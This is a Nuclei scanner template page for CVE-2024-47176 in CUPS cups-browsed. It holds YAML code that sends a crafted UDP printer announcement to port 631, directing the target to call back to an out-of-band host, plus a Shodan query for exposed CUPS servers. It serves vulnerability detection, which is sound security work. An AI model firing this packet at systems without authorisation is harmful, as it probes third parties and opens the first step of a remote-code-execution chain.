Skip to content
Nuclei Templates

CUPS - Remote Code Execution

ID: CVE-2024-47176

Severity: high

Author: princechaddha

Tags: cve,cve2024,cups,udp,printer,oast,rce

Description

Section titled “Description”

CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY-631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.Due to the service binding to *-631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.

YAML Source

Section titled “YAML Source”
id: CVE-2024-47176


info:
  name: CUPS - Remote Code Execution
  author: princechaddha
  severity: high
  description: |
    CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY-631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.
    Due to the service binding to *-631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Apply the necessary patch or upgrade to a non-vulnerable version of CUPS.
  reference:
    - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
    - https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
    - https://github.com/OpenPrinting/cups-browsed/blob/master/daemon/cups-browsed.c#L13992
    - https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
    - https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 8.3
    cve-id: CVE-2024-47176
    cwe-id: CWE-1327
    epss-score: 0.00045
    epss-percentile: 0.14875
  metadata:
    verified: true
    shodan-query: "product:cups"
  tags: cve,cve2024,cups,udp,printer,oast,rce


javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let printer_type = "00";
      let printer_state = "03";
      let printer_uri = `http://${oast}/printers/VulnPrinter`;
      let printer_location = "Office HQ";
      let printer_info = "Vulnerable Printer";
      let message = `${printer_type} ${printer_state} ${printer_uri} "${printer_location}" "${printer_info}"`;
      packet.WriteString(message)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());


    args:
      Host: "{{Host}}"
      Port: 631
      oast: "{{interactsh-url}}"


    matchers:
      - type: word
        part: interactsh_request
        words:
          - "natural-language"
          - "VulnPrinter"
        condition: and


    extractors:
      - type: regex
        group: 1
        part: interactsh_request
        regex:
          - 'User-Agent:\s?(.*)'
# digest: 490a0046304402201ed7b99e844a9fd8917468b79757f83d9fd0b381c5076537474b11f26d0c3466022059c876da649d535ad3f57a50963732ba662f53a96b0daf5bc2d99a24ddfe4b75:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "javascript/cves/2024/CVE-2024-47176.yaml"

View on Github